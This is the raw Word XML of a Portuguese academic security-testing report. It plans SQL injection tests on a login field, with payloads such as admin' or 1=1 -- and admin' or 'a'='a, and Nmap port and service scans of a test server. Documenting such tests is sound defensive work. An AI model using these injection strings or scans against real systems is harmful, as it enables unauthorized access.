          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vés de uma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930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s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essão de teste</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00384949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00930BEA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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>forçar ações não autorizadas no sistema.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Pr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="003F40A0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Verificar se o campo Login é vulnerável a injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="003F40A0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Entrada: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>admin’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F40A0" w:rsidRPr="00F15F82" w:rsidRDefault="003F40A0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F15F82" w:rsidRDefault="003F40A0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F15F82" w:rsidRDefault="00C36925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Default="005967D5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3F40A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Login.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765ACB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inline [8,9 e 10] como entrada no campo Login, a fim de modificar a instrução SQL utilizada pelo sistema na </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>consulta de dados referentes ao</w:t>
      </w:r>
      <w:r w:rsidR="00765ACB" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s usuários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cadastrados. Comentários inline </w:t>
      </w:r>
      <w:r w:rsidR="00765ACB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>serão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utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB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Entradas: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1 #   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ or 1=1  -- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB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067BC" w:rsidRPr="00F15F82" w:rsidRDefault="00765ACB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7067BC" w:rsidRPr="00F15F82" w:rsidRDefault="007067BC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realize o devido</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tratamento para impedir que as instruções de </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comentários</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> não sejam interpretada</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009F24CC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9F24CC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>como comentários inline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765ACB" w:rsidRDefault="005967D5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Pr="00F15F82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741DB" w:rsidRDefault="004741DB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48383A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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594AD8" w:rsidRPr="00F15F82" w:rsidRDefault="00594AD8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4741DB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360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Inserir um texto fazendo uso de uma única aspa simples para completar a entrada de uma possível instrução SQL executada no momento do login no sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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Entradas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7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admin’ or ‘a’=’a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="004E230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</w:p>
    <w:p w:rsidR="004E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E2307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765ACB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F15F82" w:rsidRDefault="004E2307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tratamento de todos os caracteres informados como parâmetros regulares da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00765ACB" w:rsidRDefault="005967D5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765ACB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F31428" w:rsidRDefault="00F31428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Default="00F3154F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Default="00F3154F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Default="00F3154F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Pr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00AC10DC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428" w:rsidRPr="00F3154F" w:rsidRDefault="008C6DC7" w:rsidP="00630433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3154F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Iteração 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F3154F" w:rsidRDefault="00F3154F" w:rsidP="00F3154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F31428" w:rsidP="00F315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4.3.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atividade: a</w:t>
      </w:r>
      <w:r w:rsidR="008C2F72" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nálise do s</w:t>
      </w:r>
      <w:r w:rsidR="00A83EB9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ervidor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via Nmap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no dia 09/04/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="005A089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Utilizar a ferramenta Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00F31428">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, abordada no subcapítulo 3.2,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para descobrir portas abertas no servidor e que </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atividade</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> maliciosa</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> pode</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ser desenvolvida</w:t>
      </w:r>
      <w:r w:rsidR="00A966EC" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a partir disso.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left="1415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Utilização do comando nmap -Ss -O IP_do_servidor.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F15F82" w:rsidRDefault="00CE03DD" w:rsidP="00630433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nmap” executa a ferramenta Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-Ss” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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IP_do_servidor informa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E2307" w:rsidRPr="00F15F82" w:rsidRDefault="004E230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4777A" w:rsidRPr="00F15F82" w:rsidRDefault="0084777A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas, e 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os serviços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que estão rodando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 xml:space="preserve"> nessas portas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no momento do escaneamento.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31428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Default="008C6DC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Erro na ferramenta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00A83EB9" w:rsidP="00935C82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Varredura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="00935C82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Utilização do comando nmap -sS -O IP_do_servidor.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F15F82" w:rsidRDefault="00CE03DD" w:rsidP="00630433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nmap” executa a ferramenta Nmap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“-sS” permite que a ferramenta tente fazer o scan SYN do TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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IP_do_servidor informa o IP onde está hospedada a aplicação em teste.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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97C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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explorado, as portas abertas, e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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D3D74" w:rsidRPr="00F15F82" w:rsidRDefault="00F31428" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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8C2F72" w:rsidRPr="00F15F82" w:rsidRDefault="008C2F72" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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De acordo com a figura 4,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 abertas, e </w:t>
      </w:r>
      <w:r w:rsidR="00197C78" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>serviços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que estavam rodando</w:t>
      </w:r>
      <w:r w:rsidR="00197C78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nessas portas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no momento do escaneamento.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54DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF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11355087" wp14:editId="455EFDEB">
            <wp:extent cx="4957296" cy="35052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13" cy="35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4 - Portas encontradas e os serviços que estavam rodando nelas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001923D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D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23D7" w:rsidRPr="00F15F82" w:rsidRDefault="001923D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>e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ncontrados na figura 4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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="001923D7" w:rsidRPr="00F15F82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Microsoft Windows microsoft-ds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Apache httpd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Servidor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 xml:space="preserve"> Web;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Microsoft Windows 98 netbios-ssn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>r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8C2F72" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00E513AC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Microsoft Firmware Ppt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751591" w:rsidRDefault="001923D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902307" w:rsidRDefault="0090230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513AC" w:rsidRPr="00F15F82" w:rsidRDefault="00E513A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Varredura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3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando:  nmap -sV  -O IP_do_servidor.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F15F82" w:rsidRDefault="00CE03DD" w:rsidP="00630433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nmap” executa a ferramenta Nmap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“-sV” permite que a ferramenta realize o SYN e busque a versão do </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>software rodando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no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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IP_do_servidor informa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7C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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explorado, as portas abertas, os serviços e as versões dos softwares que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00197C78" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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</w:p>
    <w:p w:rsidR="00E92559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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00197C78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De acordo com a figura 5,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 abertas, os serviços e a versão dos softwares que estavam rodando nessas portas no momento do escaneamento.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624EB" w:rsidRPr="00F15F82" w:rsidRDefault="00C624E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68400705" wp14:editId="7B5A452C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5 - Portas escaneadas e versões dos sistemas que elas estavam rodando.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751591" w:rsidP="00F3154F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Serviços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2A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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5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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows RPC </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- Ferramenta semelhante ao TeamViewer que conecta </w:t>
      </w:r>
      <w:r w:rsidR="002A5CE5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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8C6DC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Microsoft Windows microsoft-ds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Apache httpd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1923D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Microsoft Windows 98 netbios-ssn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6853AA" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r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197C78" w:rsidRPr="00F15F82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F15F82" w:rsidRDefault="00E92559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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="001923D7"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8A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="008A79EE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02307" w:rsidRDefault="0090230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Varredura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4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando  nmap -sU -O IP_do_servidor.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5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="00630433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nmap” executa a ferramenta Nmap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“-sU” permite que a ferramenta utilize o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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C0198A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IP_do_servidor informa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95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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explorado, as portas UDP abertas e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00E95ED3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</w:p>
    <w:p w:rsidR="00E92559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E95ED3" w:rsidRPr="00F15F82" w:rsidRDefault="00640C50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De acordo com a figura 6</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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, </w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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="00E95ED3"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="00E95ED3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E95ED3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="00E95ED3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UDP abertas e</w:t>
      </w:r>
      <w:r w:rsidR="00E95ED3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os serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DF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5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DF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.</w:t>
      </w:r>
      <w:r w:rsidR="00C624EB"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11C9A93" wp14:editId="5162E154">
            <wp:extent cx="5667375" cy="379349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6 - Portas UDP escaneadas e serviços que estavam rodando nelas no momento do escaneamento.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807" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC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Serviços</w:t>
      </w:r>
      <w:r w:rsidR="00B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82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B25D43" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>figura 6: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netbios-ns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NetBios [4]; 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netbios -dgm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serviço de datagrams do NetBios;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snmp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microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo utilizado pelo sistema operacional W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indows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F5692A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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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L2TP</w:t>
      </w:r>
      <w:r w:rsidR="005135D8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5135D8"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(Protocolo de Encapsulamento de C</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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amada 2</w:t>
      </w:r>
      <w:r w:rsidR="005135D8"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)</w:t>
      </w:r>
      <w:r w:rsidR="00915C31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[11] </w:t>
      </w:r>
      <w:r w:rsidR="005135D8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>– Protocolo de encapsulamento da Internet</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7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, </w:t>
      </w:r>
      <w:r w:rsidR="005135D8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utilizado por uma conexão de </w:t>
      </w:r>
      <w:r w:rsidR="00F5692A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidR="005135D8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(rede virtual privada) para acessar uma rede privada</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006515FB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35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>nat-t-like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protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00F5692A" w:rsidP="0063043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694" w:hanging="21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</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidR="003F4807" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincr</w:t>
      </w:r>
      <w:r w:rsidR="006515FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>onização de relógios usando UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F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Varredura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5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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Utilização do comando nmap -A -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A5DFB" w:rsidRPr="00F15F82" w:rsidRDefault="001A5DFB" w:rsidP="00935C82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nmap” executa a ferramenta Nmap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935C82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“-A” é para usar o Tracerouter na requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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935C82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IP_do_servidor informa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5686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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5686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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 e traçar a rota da requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0005686A" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A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515FB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8A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="0005686A" w:rsidP="006B700D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De acordo com a</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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s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 figura</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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s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 </w:t>
      </w:r>
      <w:r w:rsidR="005E239F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7</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4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 e 8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,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5E239F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>a rota traçada para a requisição ao servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A79EE" w:rsidRPr="00F15F82" w:rsidRDefault="006B700D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 wp14:anchorId="2340BC27" wp14:editId="057EE7C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>262890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>260985</wp:posOffset>
            </wp:positionV>
